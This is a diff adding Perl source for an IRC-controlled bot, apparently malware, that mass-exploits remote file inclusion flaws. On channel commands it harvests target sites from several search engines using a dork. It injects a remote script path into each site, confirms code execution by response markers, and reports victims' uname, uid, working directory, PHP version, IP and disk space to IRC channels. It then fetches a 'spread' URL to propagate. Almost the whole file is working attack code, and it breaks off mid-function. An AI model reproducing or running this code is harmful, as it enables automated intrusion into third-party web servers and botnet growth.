$dork" ); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp, +"PRIVMSG $channel :9,1UOL a terminat pentru4,1 $dork" + ); + } + my $test = "http://" . $site . $bug . $id . "?"; + my $print = "http://" . $site . $bug . $printcmd . "?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /kangkung/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1ID: $id1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + my $test2 = + "http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /kangkung/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @altavista = &altavista($dork); + push( my @tot, @allist, @alldeist, @allistus ); + my @puliti = &unici(@tot); + display( $dsp, + "PRIVMSG $channel :9,1ALTAVISTA " + . scalar(@tot) + . " 9,1/9,1 " + . scalar(@puliti) + . " 9,1pentru4,1 $dork" ); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp, +"PRIVMSG $channel :9,1ALTAVISTA a terminat pentru9,1 $dork" + ); + } + my $test = "http://" . $site . $bug . $id . "?"; + my $print = "http://" . $site . $bug . $printcmd . "?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /kangkung/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1ID: $id1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + my $test2 = + "http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /kangkung/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @searchlist = &search($dork); + my @search2 = &searchs($dork); + push( my @tot, @searchlist, @search2 ); + my @puliti = &unici(@tot); + display( $dsp, + "PRIVMSG $channel :9,1SEARCH " + . scalar(@tot) + . " 9,1/9,1 " + . scalar(@puliti) + . " 9,1 pentru4,1 $dork" ); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp, +"PRIVMSG $channel :9,1SEARCH a terminat pentru4,1 $dork" + ); + } + my $test = "http://" . $site . $bug . $id . "?"; + my $print = "http://" . $site . $bug . $printcmd . "?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /kangkung/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1ID: $id1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + my $test2 = + "http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /kangkung/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @mlist = &msn($dork); + push( my @tot, @mlist ); + my @puliti = &unici(@tot); + display( $dsp, + "PRIVMSG $channel :9,1MSN " + . scalar(@tot) + . " 9,1/9,1 " + . scalar(@puliti) + . "  9,1pentru4,1 $dork" ); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp, +"PRIVMSG $channel :12MSN a terminat pentru4,1 $dork" + ); + } + my $test = "http://" . $site . $bug . $id . "?"; + my $print = "http://" . $site . $bug . $printcmd . "?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /kangkung/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1ID: $id1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + my $test2 = + "http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /kangkung/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @asklist = &ask($dork); + push( my @tot, @asklist ); + my @puliti = &unici(@tot); + display( $dsp, + "PRIVMSG $channel :9,1ASK " + . scalar(@tot) + . " 9,1/9,1 " + . scalar(@puliti) + . " 9,1 pentru4,1 $dork" ); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp, +"PRIVMSG $channel :9,1ASK a terminat pentru4,1 $dork" + ); + } + my $test = "http://" . $site . $bug . $id . "?"; + my $print = "http://" . $site . $bug . $printcmd . "?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /kangkung/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1ID: $id1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + my $test2 = + "http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /kangkung/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + } + } + } + } + } + exit; + } + } + + if ( $line =~ /PRIVMSG $channel :$start\s+(.*?)\s+(.*)/ ) { + if ( my $pid = fork ) { + waitpid( $pid, 0 ); + } + else { + if (fork) { + exit; + } + else { + my $bug = $1; + my $dork = $2; + my $contatore = 0; + my %hosts; + my @fireball = fireball($dork); + push( my @tot, @fireball ); + my @puliti = &unici(@tot); + display( $dsp, + "PRIVMSG $channel :9,1FIREBALL " + . scalar(@tot) + . " 9,1/9,1 " + . scalar(@puliti) + . "  19,1 pentru4,1 $dork" ); + my $uni = scalar(@puliti); + + foreach my $site (@puliti) { + $contatore++; + if ( $contatore % 100 == 0 ) { + } + if ( $contatore == $uni - 1 ) { + display( $dsp, +"PRIVMSG $channel :9,1FIREBALL a terminat pentru4,1 $dork" + ); + } + my $test = "http://" . $site . $bug . $id . "?"; + my $print = "http://" . $site . $bug . $printcmd . "?"; + my $req = HTTP::Request->new( GET => $test ); + my $ua = LWP::UserAgent->new(); + $ua->timeout(5); + my $response = $ua->request($req); + if ( $response->is_success ) { + my $re = $response->content; + if ( $re =~ /kangkung/ && $re =~ /uid=/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1ID: $id1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + my $test2 = + "http://" . $site . $bug . $spread . "?"; + my $reqz = HTTP::Request->new( GET => $test2 ); + my $ua = LWP::UserAgent->new(); + my $response = $ua->request($reqz); + } + } + elsif ( $re =~ /kangkung/ ) { + my $hs = geths($print); + $hosts{$hs}++; + if ( $hosts{$hs} == "1" ) { + $x = os($test); + ( $type, $space ) = split( /\,/, $x ); + sleep(4); + display( $dsp, +"PRIVMSG $channel :9,1Exploiting .." + ); + display( $dsp, +"PRIVMSG $channel :9,1Safemode: 8,1Off 9,1Os: $os Link: $print" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uname -a: 8,1$un" + ); + display( $dsp, +"PRIVMSG $channel :9,1HDD: 8,1Free: ($free) Used: ($used) Total: ($all)" + ); + display( $dsp, +"PRIVMSG $channel :9,1Uptime: 8,1 $up" + ); + display( $dsp, +"PRIVMSG $channel :9,1PWD: 8,1$pwd1" + ); + display( $dsp, +"PRIVMSG $channel :9,1PHP Vers: 8,1 $php1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Software: 8,1 $sof1" + ); + display( $dsp, +"PRIVMSG $channel :9,1IP Addr: 8,1 $ip1" + ); + display( $dsp, +"PRIVMSG $channel :9,1Hostname: 8,1 $name1" + ); + display( $dsp, +"PRIVMSG $admin :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + display( $dsp, +"PRIVMSG $chanres :9,1Safemode:8,1 On 9,1Os: $os 8,1Link: $print" + ); + } + } + } + } + } + exit; + } + } +} + +sub display() { + if ( $#_ == '1' ) { + my $dsp = $_[0]; + print $dsp "$_[1]\n"; + } + else { + print $dsp "$_[0]\n"; + } +} + +sub os() { + my $site = $_[0]; + my $Res = query($site); + + while ( $Res =~ m/<br>uname -a:(.+?)\<br>/g ) { + $un = $1; + } + while ( $Res =~ m/<br>uptime:(.+?)\<br>/g ) { + $up = $1; + } + while ( $Res =~ m/<br>id:(.+?)\<br>/g ) { + $id1 = $1; + } + while ( $Res =~ m/<br>pwd:(.+?)\<br>/g ) { + $pwd1 = $1; + } + while ( $Res =~ m/<br>php:(.+?)\<br>/g ) { + $php1 = $1; + } + while ( $Res =~ m/<br>software:(.+?)\<br>/g ) { + $sof1 = $1; + } + while ( $Res =~ m/<br>server-ip:(.+?)\<br>/g ) { + $ip1 = $1; + } + while ( $Res =~ m/<br>server-name:(.+?)\<br>/g ) { + $name1 = $1; + } + while ( $Res =~ m/<br>os:(.+?)\<br>/g ) { + $os = $1; + } + while ( $Res =~ m/<br>free:(.+?)\<br>/g ) { + $free = $1; + } + while ( $Res =~ m/<br>used:(.+?)\<br>/g ) { + $used = $1; + } + while ( $Res =~ m/<br>total:(.+?)\<br>/g ) { + $all = $1; + } +} + +sub googlet { + my @dominios = ( + "ae", "com.ar", "at", "com.au", "be", "com.br", + "ca", "ch", "cl", "de", "dk", "eu", "sa", "id", "tr", "pl", "uk", "gov", "my", "mx" + ); + my @country = + ( "AE", "AR", "AT", "AU", "BE", "BR", "CA", "CH", "CL", "DE", "DK" ); + my @lst; + my $key = key( $_[0] ); + my $c = 0; + foreach my $i (@dominios) { + my @lista = google( $i, $key, $country[$c] ); + push( @lst, @lista ); + $c++; + } + return @lst; +} + +sub google() { + my @lst; + my $i = $_[0]; + my $key = $_[1]; + my $country = $_[2]; + for ( $b = 0 ; $b <= 100 ; $b += 100 ) { + my $Go = + ( "www.google." . $i + . "/search?hl=en&q=" + . key($key) + . "&num=100&start=" + . $b + . "&meta=cr%3Dcountry" + . $country ); + my $Res = query($Go); + while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) { + if ( $1 !~ /google/ ) { + my $k = $1; + my @grep = links($k); + push( @lst, @grep ); + } + } + } + return @lst; +} + + +sub alltheweb() { + my @lst; + my $key = $_[0]; + my $i = 0; + my $pg = 0; + for ( $i = 0 ; $i <= 1000 ; $i += 100 ) { + my $all = + ( "http://www.alltheweb.com/search?cat=web&_sb_lang=any&hits=100&q=" + . key($key) . "&o=" + . $i ); + my $Res = query($all); + while ( $Res =~ m/<span class=\"?resURL\"?>http:\/\/(.+?)\<\/span>/g ) { + my $k = $1; + $k =~ s/ //g; + my @grep = links($k); + push( @lst, @grep ); + } + } + return @lst; +} + +sub altavista() { + my @lst; + my $key = $_[0]; + for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { + my $AlT = +("http://www.altavista.com/web/results?itag=ody&q=".key($key)."&kgs=".$b); + my $Res = query($AlT); + while ( $Res =~ m/<span class=ngrn>(.+?)\//g ) { + if ( $1 !~ /altavista/ ) { + my $k = $1; + $k =~ s/<//g; + $k =~ s/ //g; + my @grep = links($k); + push( @lst, @grep ); + } + } + if ( $Res =~ /target=\"_self\">Succ/ ) { } + else { return @lst; } + } + return @lst; +} + + +sub uolsub() { + my @lst; + my $key = $_[0]; + for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { + my $UoL = + ( "http://busca.uol.com.br/www/index.html?q=" + . key($key) + . "&start=" + . $i ); + my $Res = query($UoL); + while ( $Res =~ m/<a href=\"http:\/\/([^>\"]*)/g ) { + my $k = $1; + if ( $k !~ /busca|uol|yahoo/ ) { + my $k = $1; + my @grep = links($k); + push( @lst, @grep ); + } + } + } + return @lst; +} + +sub search() { + my $key = $_[0]; + my $i = 1; + my $pg = 80; + my @lst; + my $av = 1; + while ( $i <= $pg ) { + my $search = "http://www.search.com/search?q=$key"; + my $req = HTTP::Request->new( GET => $search ); + my $ua = LWP::UserAgent->new(); + $ua->agent('Netscape 4.78/U.S., 25-Jun-01; (c) 1995-2000'); + my $response = $ua->request($req); + my $resp = $response->content; + while ( $resp =~ m/<a href=\"?http:\/\/(.+?)\//g ) { + if ( $1 !~ /msn|live|google|yahoo/ ) { + my $ok = "$1/"; + push( @lst, $ok ); + } + } + $av = $av + 10; + $i++; + } + return @lst; +} + +sub searchs() { + my @lst; + my $key = $_[0]; + for ( $b = 1 ; $b <= 100 ; $b++ ) { + my $sc = + ( "http://www.search.com/search?q=" . key($key) . "&nav=" . $b ); + my $Res = query($sc); + while ( $Res =~ m/<a href=\"?http:\/\/(.+?)/g ) { + my $k = $1; + my @grep = links($k); + push( @lst, @grep ); + } + } + return @lst; +} + +sub msn() { + my @lst; + my $key = $_[0]; + for ( $b = 1 ; $b <= 1000 ; $b += 10 ) { + my $MsN = + ( "http://search.live.com/results.aspx?q=" + . key($key) + . "&first=" + . $b + . "&FORM=PERE" ); + my $Res = query($MsN); + while ( $Res =~ m/<a href=\"?http:\/\/([^>\"]*)\//g ) { + if ( $1 !~ /msn|live/ ) { + my $k = $1; + my @grep = links($k); + push( @lst, @grep ); + } + } + } + return @lst; +} + +sub ask() { + my @lst; + my $key = $_[0]; + my $i = 0; + my $pg = 0; + for ( $i = 0 ; $i <= 1000 ; $i += 10 ) { + my $Ask = + ( "http://it.ask.com/web?q=" + . key($key) + . "&o=312&l=dir&qsrc=0&page=" + . $i + . "&dm=all" ); + my $Res = query($Ask); + while ( $Res =~ + m/<a id=\"(.*?)\" class=\"(.*?)\" href=\"(.+?)\onmousedown/g ) + { + my $k = $3; + $k =~ s/[\"\ ]//g; + my @grep = links($k); + push( @lst, @grep ); + } + } + return @lst; +} + +sub fireball() { + my $key = $_[0]; + my $inizio = 1; + my $pagine = 200; + my @lst; + my $av = 0; + while ( $inizio <= $pagine ) { + my $fireball = + "http://suche.fireball.de/cgi-bin/pursuit?pag=$av&query=" + . key($key) + . "&cat=fb_loc&idx=all&enc=utf-8"; + my $Res = query($fireball); + while ( $Res =~ m/<a href=\"?http:\/\/(.+?)\//g ) { + if ( $1 !~ /msn|live|google|yahoo/ ) { + my $k = "$1/"; + my @grep = links($k); + push( @lst, @grep ); + } + } + $av = $av + 10; + $inizio++; + } + return @lst; +} + +sub links() { + my @l; + my $link = $_[0]; + my $host = $_[0]; + my $hdir = $_[0]; + $hdir =~ s/(.*)\/[^\/]*$/\1/; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + $host .= "/"; + $link .= "/"; + $hdir .= "/"; + $host =~ s/\/\//\//g; + $hdir =~ s/\/\//\//g; + $link =~ s/\/\//\//g; + push( @l, $link, $host, $hdir ); + return @l; +} + +sub geths() { + my $host = $_[0]; + $host =~ s/([-a-zA-Z0-9\.]+)\/.*/$1/; + return $host; +} + +sub key() { + my $dork = $_[0]; + 